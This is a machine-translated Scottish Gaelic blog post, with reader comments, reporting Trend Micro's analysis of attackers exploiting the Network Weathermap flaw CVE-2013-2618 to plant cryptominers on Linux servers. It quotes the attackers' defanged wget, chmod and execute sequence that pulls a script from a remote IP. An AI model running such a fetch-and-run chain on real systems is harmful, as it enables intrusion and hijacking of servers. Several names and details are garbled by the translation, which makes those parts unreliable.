Tha locht Linux 5-bliadhna a ’toirt cothrom do luchd-ionnsaigh cryptocurrencies a mhèinneadh

tubaist linux

Tha seo bho mèinneadair cryptocurrency le cleachdadh choimpiutairean iomallach gun chead de luchd-seilbh iad sin a ’fàs na ghluasad. Bha mi mu thràth air bruidhinn mu dheidhinn seo grunn thursan an seo air a ’bhlog mun t-seòrsa suidheachadh seo.

Agus tha e gu bheil seo mu thràth air faighinn a-mach à smachd bhon mhionaid a tha cryptocurrencies air àite agus luach gu math a ghabhail, tha daoine le eòlas gu leòr gus faighinn gu coimpiutairean a bhriseas an tèarainteachd aca air ùine a chuir an dàrna taobh a ’coimhead airson fiosrachadh cudromach no cunntasan banca gus buannachd airgid fhaighinn.

An àite seo a dhèanamh bidh iad a ’roghnachadh an rud as sìmplidh ann a bhith a’ gabhail smachd air na sgiobaidhean sin agus gan aonachadh ann an lìonra mèinnearachd agus cuideachd airson gnìomhan eile a bhios iad mar as trice a ’dèanamh le botnet.

Mar seo mar as trice tha e nas motha ath-àireamhachadh a dhèanamh dhut, chan eil iad a ’cuimseachadh ach air an airgead dhìreach a tha seo a’ gineadh.

Le tuigse sgiobalta air gluasadan margaidh agus eòlas ceart air malairt crypto, faodaidh aon bhuannachd mhòr fhaighinn.

A bheil Linux dha-rìribh na shiostam tèarainte?

Tha mòran againn den bheachd gu bheil Linux na shiostam obrachaidh tèarainte a tha cha mhòr foirfe, is e an fhìrinn gu bheil lochdan ann fhathast.

Uill thacuid de làithean rinn TrendMicro lorg, anns a bheil air fhoillseachadh ùr locht ann an siostaman Linux a thug buannachd dha hackers a bhith a ’mèinneadh cryptocurrencies a ’cleachdadh frithealaichean agus innealan Linux.

Ann an aithris tron ​​bhlog agad thuirt iad na leanas:

Tron sgrùdadh againn co-cheangailte ri freagairt tachartais, chunnaic sinn oidhirpean sàrachaidh aig an robh na comharran againn comasach air ceangal a dhèanamh ri iomairt mèinnearachd cryptocurrency roimhe a chleachd malware JenkinsMiner.

An diofar: tha an iomairt seo ag amas air luchd-frithealaidh Linux. Tha e cuideachd na chùis chlasaigeach de chugallachd ath-chleachdte, leis gu bheil e a ’gabhail brath air locht tèarainteachd seann-fhasanta a tha air a bhith ri fhaighinn airson faisg air còig bliadhna.

Anns an sgaoileadh seo tron ​​anailis agad air na làraich air an tug seo buaidh a chomharrachadh airson an teip seo a Bidh e gu ìre mhòr a ’toirt buaidh air Iapan, Taiwan, Sìona, na SA agus na h-Innseachan.

Mion-sgrùdadh ionnsaigh

Tro anailis le Lìonra Dìon Trend Micro Smart beagan mion-fhiosrachadh air mar a bhios luchd-ionnsaigh a ’gabhail brath air an locht seo:

Bha luchd-obrachaidh na h-iomairt seo a ’gabhail brath air CVE-2013-2618, so-leòntachd le ceann-latha ann am plugan Camapi Network Weathermap, a bhios luchd-rianachd an t-siostaim a’ cleachdadh gus gnìomhachd lìonra fhaicinn.

A thaobh carson a tha iad a ’gabhail brath air seann locht tèarainteachd: chan eil Network Weathermap ach dà chugallachd a chaidh aithris gu poblach gu ruige seo, gach cuid bhon Ògmhios 2014.

Faodaidh an luchd-ionnsaigh sin a bhith a ’gabhail brath chan e a-mhàin locht tèarainteachd air a bheil brath ri fhaighinn ach cuideachd an dàil paiste a tha a’ tachairt ann am buidhnean a ’cleachdadh an inneal stòr fosgailte.

Gu bunaiteach tha an ionnsaigh tro ionnsaigh XSS:

maoim-sìde-cryptominer-4

Is e am pàirt fuzzy an targaid ionnsaigh, frithealaiche lìn le port.

Am faidhle /plugins/weathermap/configs/conn.php a bheil am faidhle mar thoradh air an ionnsaigh leantainneach XSS air / plugins / weathermap / php .

A bharrachd air conn.php An toiseach, chì sinn iarrtas HTTP coltach ri seo air duilleag ris an canar ' fuarachadh.php '.

Tha am prògram airson mèinneadh cryptocurrencies air a chuairteachadh tron ​​so-leòntachd bho mhapa sìde PHP air targaidean a tha nan luchd-frithealaidh Linux

San ìomhaigh chì thu mar a thèid an ionnsaigh a ghineadh agus tha e air a mhìneachadh mar a leanas:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Is e na tha e a ’dèanamh ach an comharra a chuir a-nuas gus faidhle a luchdachadh sìos le wget, a tha na ghoireas a tha cha mhòr a h-uile cuairteachadh Linux air a chuir a-steach gu bunaiteach.

chmod 775 watchd0g.sh

a ’dèanamh am faidhle so-ghnìomhaichte

./watchd0g.sh

Is e na tha e a ’dèanamh aig a’ cheann thall am faidhle a ruith air an fhrithealaiche.

Gu fortanach tha paiste ann mu thràth ( CVE-2013-2618 ) ri fhaighinn airson fàilligeadh agus Faodaidh tu a luchdachadh sìos bho an ceangal seo

Si tha thu airson tuilleadh fhaighinn a-mach mu dheidhinn den teip seo faodaidh tu tadhal air a ’cheangal seo.

Tobar: Cryptocurrency Miner air a chuairteachadh tro So-leòntachd PHP Weathermap, Targaidean frithealaichean Linux


Tha susbaint an artaigil a ’cumail ri na prionnsapalan againn de moraltachd deasachaidh. Gus aithris a dhèanamh air mearachd cliog an seo.

5 bheachd, fàg do chuid fhèin

Fàg do bheachd

Seòladh-d cha tèid fhoillseachadh.

*

*

  1. Uallach airson an dàta: Miguel Ángel Gatón
  2. Adhbhar an dàta: Smachd air SPAM, riaghladh bheachdan.
  3. Dìleab: Do chead
  4. Conaltradh an dàta: Cha tèid an dàta a thoirt do threas phàrtaidhean ach a-mhàin fo dhleastanas laghail.
  5. Stòradh dàta: Stòr-dàta air a chumail le Occentus Networks (EU)
  6. Còraichean: Aig àm sam bith faodaidh tu am fiosrachadh agad a chuingealachadh, fhaighinn air ais agus a dhubhadh às.

  1.   Miguel Mayol agus Tur thuirt

    Chan eil a bhith nad leth-fhacal sàbhailte, agus a dh ’aindeoin sin bidh Linux gad shàbhaladh.
    Chan e Linux a tha ag ùrachadh a bhith ag ùrachadh nam pìosan tèarainteachd. Is e an locht a th ’ann gu bheil cuid de chompanaidhean, gus airgead a shàbhaladh, a’ fastadh idiots mar luchd-rianachd siostaim,
    Ach a dh ’aindeoin sin, tha e AIR A CHUR AIR A CHUR AIR A DHÈANAMH agus air fhuasgladh sa bhad, tha eadhon tachartas tèarainteachd beag sam bith mar seo air fhoillseachadh.

  2.   Tha mi ag iarraidh Villa mar eldekoletas thuirt

    Agus dè an locht a th ’air Linux nach eil na h-ùrachaidhean aige air an cur an gnìomh? Bidh luchd-leasachaidh GNU / Linux a ’coileanadh an rùin le bhith a’ leasachadh fhuasglaidhean mu chugallachd a tha a ’tighinn am bàrr agus gan toirt do luchd-cleachdaidh. Ma dh ’òrdaicheas an dotair banachdach a’ chnatain mhòir agus nach fhaigh thu e, bidh thu tinn is rag… an e coire an dotair a th ’ann?

  3.   Guillermo thuirt

    Leis nach eil Linux mar a bha e, dà naidheachd ann an sreath le dà phrìomh bhiteag:
    1.- Ann an luchd-deasachaidh nas fheàrr airson leasachadh bidh iad a ’cur fear nach eil na bhathar-bog an-asgaidh agus bidh iad a’ dìochuimhneachadh feadhainn eile a tha (tha iad air an ainmeachadh anns na beachdan).
    2.- Naidheachd uamhasach mu bhìorasan nuair nach toir iad buaidh ach air luchd-frithealaidh NACH EIL. Ach ma chaidh linux sam bith ùrachadh gu bunaiteach airson deicheadan. Gus eagal a chuir mar gum biodh feum air anti-bhìoras suirghe ann an stoidhle Windows. Tha e coltach gu bheil iad a ’feuchainn ri ràdh gu bheil Linux an aon rud ri Windows agus nach eil.
    Ma tha biast sean agus ma tha e air a bhith mu thràth, chan e naidheachd no dad a th ’ann. Na bi a ’cluich Microsoft agus companaidhean anti-bhìoras leithid Trend Micro, Norton, Panda no McAffee, no faigh pàigheadh.
    Co-dhiù, bha sinn a ’cleachdadh Trend Micro airson grunn bhliadhnaichean anns a’ chompanaidh agus b ’e fìor bhuntàta a bh’ ann, cac, oir bha an siostam aige ag ràdh gu robh “lorgan” de bhìorasan aig neach-gnìomh (rudeigin a dh ’fhaodadh a bhith na bhìoras, eadhon ged a bhiodh e gun a bhith) agus carson a thug e air falbh e (thug e gu eòlaire e gus nach ruith e) gun a bhith a ’ceadachadh a chleachdadh, agus cha robh neach-gealachaidh ann gus an giùlan seo a bhacadh le faidhle sàbhailte a chuir an gnìomh a dh’ fheumamaid a chleachdadh. Rach shit. B ’e an dreach corporra a bh’ ann, bha an comas geal seo aig an dreach fa leth. Pathetic.

  4.   Guillermo thuirt

    Na toir cunntas ort fhèin cho eireachdail.
    Tha an artaigil a ’bruidhinn mu dheidhinn toll tèarainteachd a leigeas leat a dhol a-steach do phrògram, a dhèanamh comasach a chuir an gnìomh agus a ruith, agus sin an toll tèarainteachd a dh’ fheumas a h-uile bhìoras a sgaoileadh, gu follaiseach mar bhìoras a dh ’fheumadh am prògram a chaidh a chuir a-steach a bhith na chòd. comas coimpiutairean scan air an lìonra gus an obair a dhèanamh a-rithist agus fèin-chopadh. Cha bhith iad dìreach a ’dèanamh seo oir ann an Linux tha na tuill tèarainteachd a chaidh an lorg air an còmhdach le bad tèarainteachd, agus is e sin a tha mi a’ ciallachadh leis an eadar-dhealachadh eadar Windows agus Linux, leis nach eil feum air anti-bhìoras, ach airson an toll a chòmhdach. Ann an Windows tha e nas duilghe airson grunn adhbharan: 1.- Faodaidh na faidhlichean a bhith air an coileanadh dìreach air sgàth an leudachadh, a ’cur às do cheum airson an toirt a-steach air a’ choimpiutair air a bheil buaidh. 2.- Tha luchd-cleachdaidh an-còmhnaidh a ’stàladh phrògraman de thùs amharasach oir tha iad seilbh agus feumaidh iad a bhith aca gun phàigheadh ​​(chan eil mi ag ràdh dad dè a bhiodh e airson eaconamaidh dachaigh MS Office, Photoshop, a cheannach… barrachd air a bhith a’ dùblachadh cosgais an uidheamachd coimpiutair). 3.- Ann an ùine ghoirid no nas fhaide bidh an Windows a ’sruthadh, bheir an neach-cleachdaidh e chun nàbaidh, caraid, ... a bhios, gus nach caith e ùine, a’ cruth a h-uile càil agus a ’stàladh Windows mu dheireadh le bad gnìomhachaidh nach eil air ùrachadh no sin bidh am paiste fhèin a ’cur prògram brathaidh. Dh ’fhaodadh e a bhith nach eil agus tha e fìor mhath, ach dh’ fhaodadh e a bhith gu bheil agus gu bheil Windows a ’spionadh air na faclan-faire. Anns an artaigil tha iad a ’toirt iomradh air an t-siostam ro-ràdh ann an linux air a bheil an so-leòntachd a’ toirt buaidh, is e a bhith a ’dèanamh a’ phrògraim a bhios a ’sganadh an lìonra gu fèin-ghluasadach agus ga chleachdadh gus leth-bhreac a dhèanamh dheth fhèin agus a ruith air an fhrithealaiche am pàirt as fhasa de na h-uile, air an adhbhar sin na thuirt e san artaigil an ceum as cudromaiche airson bhìoras sam bith: fios a bhith agad air cho cugallach ‘s a tha an siostam ionnsaigh a thoirt.

  5.   hambaglio thuirt

    Droch fhiosrachadh. Chan e bug a tha seo ann an Linux, is e bug a th ’ann an IARRTAS PHP, is e sin, tha e ioma-chruth. Chan eil e eadhon toirmeasgach do shiostaman a tha a ’ruith an kernel linux! Ach eadhon ged nach robh an tagradh tar-àrd-ùrlar, cha b ’e bug Linux a bhiodh ann, cha bhiodh ann ach tagradh.

    Chan eil an eadar-ghluasad as lugha aig an Linux kernel ann a bhith a ’dìon an aghaidh ionnsaighean sgrìobadh thar-làrach mar an tè seo. Co-dhiù rannsaich CÒIG GEÀRR-CHUNNTAS mus cuir thu post air sgàth gu bheil an fhìrinn gu bheil thu a ’dol a choimhead gu dona dha neach sam bith aig a bheil beagan fiosrachaidh mu rudeigin.